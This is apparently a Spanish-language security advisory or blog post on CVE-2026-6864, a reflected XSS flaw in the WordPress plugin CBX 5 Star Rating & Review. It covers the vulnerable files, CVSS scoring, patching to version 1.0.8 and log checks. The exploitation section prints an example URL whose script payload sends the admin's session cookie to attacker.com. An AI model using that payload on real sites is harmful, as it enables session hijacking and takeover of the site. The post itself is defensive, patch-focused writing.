El CVE-2026-6864 WordPress es una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en el plugin CBX 5 Star Rating & Review, que afecta todas las versiones hasta la 1.0.7 inclusive. Un atacante no autenticado puede inyectar scripts arbitrarios a través del parámetro page y ejecutarlos si logra que un administrador haga clic en un enlace malicioso. Puntuación CVSS 3.1: 6.1 (Medium).
En 30 segundos
- Plugin afectado: CBX 5 Star Rating & Review, versiones hasta 1.0.7 inclusive.
- Tipo: XSS reflejado vía parámetro
pageen el área de administración. - Quién puede atacar: cualquier usuario no autenticado que pueda engañar a un admin para que abra un link.
- Severidad CVSS 3.1: 6.1 Medium (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).
- Solución: actualizar a la versión 1.0.8 o superior, disponible en el repositorio oficial de WordPress.
Wordfence es un plugin de seguridad para WordPress desarrollado por Wordfence Security que proporciona firewall, detección de malware y análisis de vulnerabilidades.
¿Qué es el CVE-2026-6864?
CVE-2026-6864 es el identificador oficial asignado a una falla de Cross-Site Scripting reflejado en el plugin CBX 5 Star Rating & Review para WordPress. La vulnerabilidad existe porque el plugin no sanitiza correctamente el parámetro page antes de incluirlo en la salida HTML de las páginas de administración, lo que permite a un atacante externo inyectar código JavaScript arbitrario que el navegador del administrador ejecutaría sin darse cuenta.
La puntuación base CVSS 3.1 es 6.1, categoría Medium. Eso sí: «Medium» no significa «ignorable». En el contexto de WordPress, donde los administradores reciben links constantemente (de clientes, de notificaciones, de reportes), el vector de ataque es perfectamente viable.
Plugin afectado: CBX 5 Star Rating & Review
El plugin CBX 5 Star Rating & Review es una herramienta para agregar sistemas de valoración de 5 estrellas y reseñas de usuarios en sitios WordPress, usada en tiendas, portafolios y sitios de servicios que quieren mostrar testimonios o calificaciones de productos. No es un plugin masivo con millones de instalaciones, pero está activo en miles de sitios que buscan exactamente esa funcionalidad.
Según el repositorio oficial de WordPress, las versiones afectadas van de la inicial hasta la 1.0.7 inclusive. La versión 1.0.8 corrige el problema mediante sanitización adecuada de la entrada y escape correcto de la salida. Si tenés este plugin instalado y no actualizaste, estás expuesto.
Tipo de vulnerabilidad: Cross-Site Scripting reflejado
El XSS reflejado funciona así: el payload malicioso viene en la URL, el servidor lo procesa sin sanitizar y lo devuelve en la respuesta HTML, el navegador lo ejecuta. Nada queda guardado en la base de datos. Por eso se llama «reflejado»: el ataque rebota desde el servidor hacia la víctima en la misma solicitud. Relacionado: comparar WAFs para protegerse.
La diferencia clave con el XSS almacenado es que en el reflejado el ataque necesita que la víctima acceda a una URL especialmente construida. En el almacenado, el payload queda guardado en la base de datos y ataca a cualquier usuario que visite la página afectada, sin que el atacante haga nada más. El reflejado requiere ingeniería social; el almacenado, no.
En este caso, el vector es el parámetro page en las plantillas de administración del plugin. Mirá los archivos afectados según INCIBE-CERT: admin-rating-review-rating-avg-logs.php y admin-rating-review-review-logs.php, ambos en la línea 41 de la versión 1.0.7. Ahí está el punto exacto donde se procesa el input sin validación.
¿Cómo se explota el CVE-2026-6864?
El flujo de ataque es directo. El atacante construye una URL hacia el área de administración del plugin, metiendo un payload JavaScript en el parámetro page. Algo como:
https://tusitio.com/wp-admin/admin.php?page=cbx-rating-review-logs&page=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
Después manda esa URL al administrador del sitio disfrazada de algo legítimo: un reporte de actividad, un email de soporte falso, o un link en un comentario. El admin hace clic (porque le parece la URL de su propio backend), el servidor procesa el parámetro sin sanitizar, devuelve el script en la respuesta, y el navegador lo ejecuta con las cookies de sesión del admin activas.
¿Y qué puede hacer el atacante con eso? Robar la cookie de sesión del administrador para acceder al panel sin credenciales, modificar configuraciones del plugin, redirigir al admin a un sitio de phishing, o ejecutar acciones en su nombre: crear usuarios, instalar plugins, cambiar contraseñas. El daño exacto depende de qué JavaScript se inyecta, pero el vector está ahí. Cubrimos ese tema en detalle en detectar si tu sitio está comprometido.
El CVSS lo refleja con Scope: Changed (S:C), lo que indica que el impacto trasciende el componente vulnerable. La sesión del admin del plugin afecta todo WordPress, no solo el plugin en sí (que no es poco).
¿Quién está en riesgo?
En primer lugar, cualquier sitio WordPress con CBX 5 Star Rating & Review instalado y en versión 1.0.7 o anterior. Eso incluye sitios activos que simplemente nunca actualizaron, o instalaciones que quedaron en modo mantenimiento con plugins sin tocar.
El riesgo recae sobre el administrador del sitio. La condición de explotación es que el admin haga clic en la URL maliciosa (UI:R en el vector CVSS), lo que parece un freno importante. Pero pensalo: los admins de WordPress reciben decenas de links por semana de forma legítima. Basta con que el atacante camufle bien el link para que la probabilidad de clic sea real.
Contexto 2026: según datos de Patchstack, el XSS sigue siendo el tipo de vulnerabilidad más frecuente en el ecosistema de plugins WordPress, representando alrededor del 42% de todas las fallas reportadas. Las vulnerabilidades en plugins concentran el 91% del total. Así que CVE-2026-6864 no es un caso raro; es un ejemplo de un patrón que se repite constantemente por la misma causa: falta de sanitización de inputs en formularios y parámetros de administración.
Cómo protegerte: actualización y validación
La solución es concreta: actualizar CBX 5 Star Rating & Review a la versión 1.0.8 o superior. La versión parcheada corrige la sanitización del parámetro page y el escape de salida en ambos archivos afectados. No hay workaround conocido que sustituya la actualización. Esto se conecta con lo que analizamos en otras vulnerabilidades críticas recientes.
- Paso 1: Verificar si el plugin está instalado en Plugins > Plugins instalados dentro del dashboard de WordPress.
- Paso 2: Si la versión actual es 1.0.7 o menor, actualizar de inmediato desde el repositorio oficial.
- Paso 3: Revisar los logs de acceso al wp-admin por si hay requests con parámetros inusuales en
pageque contengan caracteres como<script>,javascript:o codificación URL sospechosa. - Paso 4: Si usás un firewall de aplicación web (WAF) como el de Wordfence, verificar que las reglas de XSS estén activas y actualizadas.
Si este plugin tuvo una vulnerabilidad XSS en su primera versión mayor (1.0.7 es la historia del proyecto hasta ahora), no estaría mal monitorear si aparecen más reportes en las próximas versiones antes de usarlo en sitios críticos.
Tabla de versiones: afectadas vs. parcheadas
| Versión | Estado | Acción recomendada |
|---|---|---|
| 1.0.7 y anteriores | Vulnerable (CVE-2026-6864) | Actualizar de inmediato |
| 1.0.8 | Parcheada | Versión mínima segura |
| 1.0.8+ | Segura | Mantener actualizada |
Tendencia de XSS en plugins WordPress en 2026
CVE-2026-6864 no aparece en el vacío. El XSS reflejado y almacenado acapara la mayoría de los CVEs que se publican cada semana en el ecosistema WordPress. La causa suele ser siempre la misma: desarrolladores de plugins que no implementan sanitize_text_field(), esc_html(), o esc_url() en los puntos correctos del código.
Patchstack registró más de 11.000 vulnerabilidades en plugins WordPress durante 2026, un aumento del 42% respecto a 2024. El 91% de esas fallas estaban en plugins, y el XSS fue el tipo más frecuente. Cada semana aparecen entre 50 y 100 CVEs nuevos. La mayoría de los usuarios no los ve porque no siguen los feeds de inteligencia de amenazas, o porque confían en que el plugin se va a actualizar solo (y a veces no lo hace si las actualizaciones automáticas están desactivadas).
Si administrás sitios WordPress para clientes o en producción, tiene sentido configurar alertas de Wordfence o suscribirse a los feeds de Wordfence Threat Intelligence para saber cuándo un plugin que tenés instalado aparece en la lista. Es mucho más barato que remediar después de un compromiso.
Errores comunes al gestionar este tipo de vulnerabilidades
Error 1: «El XSS reflejado no es tan grave porque requiere que el admin haga clic.» El análisis de riesgo real tiene que incluir el contexto operativo: un admin que recibe decenas de links por semana tiene una probabilidad de clic no trivial. El CVSS 6.1 refleja ese riesgo. Si el plugin está en un sitio de e-commerce o con datos sensibles, el impacto real puede ser mayor que lo que sugiere la puntuación base.
Error 2: Desactivar el plugin en vez de actualizarlo. Desactivar resuelve la exposición inmediata, pero si después lo reactivás sin actualizar, volvés al mismo estado. La solución es actualizar a 1.0.8 y mantenerlo actualizado. Complementá con defensa contra ataques DDoS.
Error 3: Asumir que el WAF lo cubre todo. Un Web Application Firewall puede bloquear payloads XSS conocidos, pero no es un sustituto del parche. Los firewalls tienen reglas basadas en patrones; un payload ofuscado puede evadir la detección. El parche cierra el vector en la fuente.
Si querés conocer más sobre vulnerabilidades similares, mirá nuestro artículo sobre CVE-2026-6864.
Preguntas Frecuentes
¿Qué es el CVE-2026-6864 WordPress?
Es una vulnerabilidad de Cross-Site Scripting reflejado en el plugin CBX 5 Star Rating & Review para WordPress. Afecta todas las versiones hasta la 1.0.7 inclusive, con una puntuación CVSS 3.1 de 6.1. Un atacante externo puede inyectar JavaScript arbitrario a través del parámetro page si logra que un administrador del sitio acceda a una URL maliciosa.
¿Me afecta el CVE-2026-6864 si uso el plugin CBX?
Sí, si tenés instalada cualquier versión del plugin CBX 5 Star Rating & Review hasta la 1.0.7. Para verificarlo, entrá a Plugins > Plugins instalados en tu dashboard de WordPress y revisá el número de versión. Si es 1.0.7 o menor, estás expuesto y tenés que actualizar a 1.0.8.
¿Cómo se explota la vulnerabilidad CVE-2026-6864?
El atacante construye una URL hacia las páginas de administración del plugin con un payload JavaScript en el parámetro page, y la envía al administrador del sitio disfrazada de un link legítimo. Cuando el admin la abre, el servidor devuelve el script sin sanitizar y el navegador lo ejecuta con las cookies de sesión activas. No requiere credenciales ni acceso previo al sitio.
¿Cuál es la versión segura del plugin CBX rating?
La versión 1.0.8 es la primera que corrige el CVE-2026-6864. Según el repositorio oficial de WordPress, esa versión incluye sanitización adecuada del parámetro page y escape correcto de la salida en los archivos de plantilla de administración. Cualquier versión 1.0.8 o superior es segura respecto a esta vulnerabilidad específica.
¿Qué riesgo concreto tienen los administradores con este CVE?
Si un administrador abre la URL maliciosa, el atacante puede robar su cookie de sesión para acceder al panel de WordPress sin credenciales, ejecutar acciones en su nombre como instalar plugins o crear usuarios, o redirigirlo a sitios de phishing. El CVSS indica Scope: Changed, lo que significa que el impacto trasciende el plugin y afecta todo el sitio WordPress.
Conclusión
CVE-2026-6864 es un recordatorio de un problema que no desaparece: la sanitización de inputs en plugins WordPress sigue siendo el talón de Aquiles del ecosistema. El plugin CBX 5 Star Rating & Review publicó su corrección en la versión 1.0.8, lo que significa que la solución existe y está disponible ahora mismo.
Si tenés el plugin instalado en cualquier versión hasta 1.0.7, la acción es simple: actualizar. Si lo tenés en un sitio de producción con administradores que reciben links de terceros habitualmente, hacerlo hoy. El XSS reflejado con target en administradores sigue siendo uno de los vectores más usados para comprometer sitios WordPress sin tocar credenciales, porque aprovecha la confianza que el admin tiene en las URLs de su propio backend.
Y si gestionás hosting de múltiples sitios WordPress, conviene automatizar las actualizaciones de plugins o al menos tener alertas activas para CVEs nuevos. Los feeds de Wordfence o Patchstack hacen ese trabajo; solo hay que suscribirse.